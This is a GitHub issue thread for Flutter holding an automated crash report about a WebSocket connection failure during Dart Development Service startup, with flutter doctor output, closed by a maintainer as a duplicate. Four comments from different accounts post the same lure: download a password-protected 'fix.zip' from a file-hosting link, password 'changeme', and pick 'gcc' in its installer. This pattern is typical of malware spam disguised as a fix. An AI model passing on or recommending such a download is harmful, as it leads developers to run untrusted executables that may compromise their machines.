### ISSUE TITLE
[tool_crash] StateError: Bad state: WebSocketChannelException: HttpException: Connection closed before full header was received, uri = http://127.0.0.1:33277/0EfNlFPplF0=/ws

### ISSUE THREAD

**Issue by babukn** [flutter/flutter#154100] opened 2024-08-26 09:16 UTC
## Command
```sh
flutter --no-color run --machine --track-widget-creation --device-id=emulator-5554 --start-paused --dart-define=flutter.inspector.structuredErrors=true lib/main.dart
```

## Steps to Reproduce
1. ...
2. ...
3. ...

## Logs
StateError: Bad state: WebSocketChannelException: HttpException: Connection closed before full header was received, uri = http://127.0.0.1:33277/0EfNlFPplF0=/ws
```console
#0      DartDevelopmentService.startDartDevelopmentService (package:flutter_tools/src/base/dds.dart:290:9)
<asynchronous suspension>
#1      FlutterDevice.connect.<anonymous closure> (package:flutter_tools/src/resident_runner.dart:294:11)
<asynchronous suspension>
```
```console
[✓] Flutter (Channel master, 3.25.0-1.0.pre.69, on Ubuntu 20.04.6 LTS 5.15.0-119-generic, locale en_US.UTF-8)
    • Flutter version 3.25.0-1.0.pre.69 on channel master at /home/kn/android-studio-2024.1.1.13-linux/flutter
    • Upstream repository https://github.com/flutter/flutter.git
    • Framework revision b8f89f70bf (5 days ago), 2024-08-21 23:26:16 +0530
    • Engine revision b94e009703
    • Dart version 3.6.0 (build 3.6.0-164.0.dev)
    • DevTools version 2.39.0-dev.15

[!] Android toolchain - develop for Android devices (Android SDK version 35.0.0)
    • Android SDK at /home/kn/Android/Sdk
    ✗ cmdline-tools component is missing
      Run `path/to/sdkmanager --install "cmdline-tools;latest"`
      See https://developer.android.com/studio/command-line for more details.
    ✗ Android license status unknown.
      Run `flutter doctor --android-licenses` to accept the SDK licenses.
      See https://flutter.dev/to/linux-android-setup for more details.

[✓] Chrome - develop for the web
    • Chrome at google-chrome

[✗] Linux toolchain - develop for Linux desktop
    • clang version 10.0.0-4ubuntu1
    • cmake version 3.25.2
    • ninja version 1.10.0
    • pkg-config version 0.29.1
    ✗ GTK 3.0 development libraries are required for Linux development.
      They are likely available from your distribution (e.g.: apt install libgtk-3-dev)

[✓] Android Studio (version 2024.1)
    • Android Studio at /home/kn/android-studio-2024.1.1.13-linux/android-studio
    • Flutter plugin version 81.0.2
    • Dart plugin can be installed from:
      🔨 https://plugins.jetbrains.com/plugin/6351-dart
    • Java version OpenJDK Runtime Environment (build 17.0.11+0-17.0.11b1207.24-11852314)

[✓] VS Code (version 1.92.2)
    • VS Code at /usr/share/code
    • Flutter extension version 3.94.0

[✓] Connected device (4 available)
    • SM A546E (mobile)             • RZCW81LNQ6K   • android-arm64  • Android 14 (API 34)
    • sdk gphone16k x86 64 (mobile) • emulator-5554 • android-x64    • Android 15 (API 35) (emulator)
    • Linux (desktop)               • linux         • linux-x64      • Ubuntu 20.04.6 LTS 5.15.0-119-generic
    • Chrome (web)                  • chrome        • web-javascript • Google Chrome 124.0.6367.91

[✓] Network resources
    • All expected network resources are available.

! Doctor found issues in 2 categories.

```

## Flutter Application Metadata
**Type**: app
**Version**: 1.0.0+1
**Material**: true
**Android X**: false
**Module**: false
**Plugin**: false
**Android package**: null
**iOS bundle identifier**: null
**Creation channel**: stable
**Creation framework version**: 4d9e56e694b656610ab87fcf2efbcd226e0ed8cf
### Plugins
path_provider_linux-2.2.1
path_provider_windows-2.3.0
shared_preferences-2.3.2
shared_preferences_android-2.3.1
shared_preferences_foundation-2.5.2
shared_preferences_linux-2.4.1
shared_preferences_web-2.4.2
shared_preferences_windows-2.4.1

**Comment by swaggy111** [comment] 2024-08-26 09:16
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment] 2024-08-26 09:16
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment] 2024-08-26 09:16
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by huycozy** [comment] 2024-08-26 11:18
Closing this as a duplicate of https://github.com/flutter/flutter/issues/153825. Please help to answer the question at https://github.com/flutter/flutter/issues/153825#issuecomment-2301653113. Thanks!

**Closed by huycozy** 2024-08-26 11:18 UTC
Labels: in triage

**Comment by sunshinezxq** [comment] 2024-08-26 12:22
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
